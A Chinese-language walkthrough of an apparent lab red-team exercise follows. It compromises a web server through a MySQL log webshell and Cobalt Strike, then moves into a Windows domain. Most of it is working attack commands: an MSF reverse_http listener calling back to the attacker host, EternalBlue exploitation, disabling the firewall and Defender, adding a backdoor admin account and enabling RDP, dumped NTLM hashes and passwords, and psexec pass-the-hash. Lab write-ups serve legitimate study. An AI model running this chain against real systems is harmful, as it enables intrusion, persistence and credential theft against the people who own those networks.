NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163二、目标
一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集 三、内网收集 7.内网——继续信息收集 8.内网攻击姿势——信息泄露 9.内网攻击姿势——MS08-067 10.内网攻击姿势——SMB远程桌面口令猜测 11.内网攻击姿势——Oracle数据库TNS服务漏洞 12.内网攻击姿势——RPC DCOM服务漏洞 四、横向移动 13.内网其他主机端口——文件读取 14.内网其他主机端口——redis 15.内网其他主机端口——redis Getshell 16.内网其他主机端口——MySQL数据库 17.内网其他主机端口——MySQL提权 五、构建通道 18.内网其他主机端口——代理转发 六、持久控制 19.域渗透——域成员信息收集 20.域渗透——基础服务弱口令探测及深度利用之powershell 21.域渗透——横向移动[wmi利用] 22.域渗透——C2命令执行 23.域渗透——利用DomainFronting实现对beacon的深度隐藏 24.域渗透——域控实现与利用 七、痕迹清理 25、日志清理三、WEB外网打点 3.1 日志文件Getshell
访问网站:
猜解MySQL数据库连接检测:(root/root)
目录扫描dirsearch(phpmyadmin):
直接写入木马到网站的根目录,写入失败(需要修改 MySQL 配置才行)。所以可以采用MySQL日志导入木马。
查看日志状态: show variables like '%general%'; 开启general_log为True: SET GLOBAL general_log='on'; 执行命令指定日志写马: SET GLOBAL general_log_file='C:/phpStudy/www/1.php'; 写入一句话到马中: SELECT '';
访问日志文件:
冰蝎/蚁剑/菜刀连接:
3.2 后台文件上传getshellyxcms模板:
登录后台后——前台模板——新建:(写入木马)连接即可。
四、内网信息收集 4.1 上线CS管理员启动命令行:teamserver 172.16.12.1 123456
攻击——生成后门——windowsExecutable(S)——用冰蝎蚁剑上传服务器——运行
上线CS成功:
net view #查看局域网内其他主机名 net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user #查看本机用户列表 net user /domain #查看域用户 net localgroup administrators #查看本地管理员组(通常会有域用户) net view /domain #查看有几个域 net user 用户名 /domain #获取指定域用户的信息 net group /domain#查看域里面的工作组,查看把用户分了多少组(域控上操作) net group 组名 /domain #查看域中某工作组 net group "domain admins" /domain #查看域管理员的名字 net group "domain computers" /domain #查看域中的其他主机名 net group "doamin controllers" /domain #查看域控制器主机名1.判断是否存在域
shell ipconfig /all(SYSTEM)
shell net config Workstation(Administrator)
2.判断是否存在多个域shell net view /domain
3.确认域控主机名称shell net group “domain controllers” /domain
4.查看域内其他主机信息shell net view
shell net group “domain computers” /domain
五、横向渗透 (永恒之蓝) 5.1 联动MSF监听MSF开启监听: use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost MSFIP地址(172.16.12.187) set lport 6666 exploit
CS开启监听:
增加会话,选择MSF:
5.2 判断陷阱查看监听当前目录: ls 判断靶机是否进入蜜罐:run post/windows/gather/checkvm 列举安装程序:run post/windows/gather/enum_applications5.3 静态路由配置
MSF 的 autoroute 模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由,直接使用 MSF 去访问原本不能直接访问的内网资源,只要路由可达我们既可使用 MSF 来进行探测了。 #加载MSFautoroute模块,探测当前机器所有网段信息 meterpreter > run post/multi/manage/autoroute #添加目标内网路由 meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD5.4 内网继续信息收集 5.4.1 扫描域内其他主机开放的端口
(扫描靶机2008R2) msf6>use auxiliary/scanner/portscan/tcp msf6>set rhost 192.158.52.141 msf6>set ports 80,135-139,445,3306,3389 msf6>run5.4.2 扫描漏洞
msf6>search ms17_010msf6>use auxiliary/scanner/smb/smb_ms17-010msf6>set rhosts 192.168.52.141msf6>run5.4.3 关闭跳板机win7防火墙
msf6>sessions -l #查看所有绘画msf6>sessions 4 #进入会话4中netsh advfirewall set allprofiles state off #关闭防火墙net stop windefend #关闭windows defender5.4.4 永恒之蓝
use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhosts 192.168.52.138run(3389远程)
开启靶机win7远程桌面MSF:run post/windows/manage/enable_rdpwindows:# win7开启3389REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f# 添加账户密码net user Tr0e Pass!@123 /add# 给Tr0e账户添加为管理员权限net localgroup administrators Tr0e /add# 查询是否成功添加 Tr0e 用户net user Tr0e# 添加防火墙规则netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
连接用户名 GODAdministrator 密码cllmsyK123
(MSF哈希传递攻击PTH) 5.5 Hash传递攻击【哈希传递攻击】在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机,操作简单、威力无穷。在域环境中,利用哈希传递攻击的渗透方式往往是这样的: 1.获得一台域主机的权限,Dump 内存获得该主机的用户密码 Hash 值; 2.通过哈希传递攻击尝试登录其他主机; 3.继续搜集 Hash 并尝试远程登录,直到获得域管理员账户 Hash,登录域控,最终成功控制整个域。
msv : [00000003] Primary * Username : Administrator * Domain : GOD * LM : 63b1e629a4f9202f82fbc0049075c50d * NTLM : 9d0ba28e4fcf08d74bf61b4d50c46474 * SHA1 : e2b817228b94e9bec7e979516b98b604880ad5a8 tspkg : * Username : Administrator * Domain : GOD * Password : cllmsyK5.6 MSF
use exploit/windows/smb/psexec set rhosts 192.168.52.138 set smbuser Administrator set smbdomain GOD set smbpass 00000000000000000000000000000000:9d0ba28e4fcf08d74bf61b4d50c46474 run
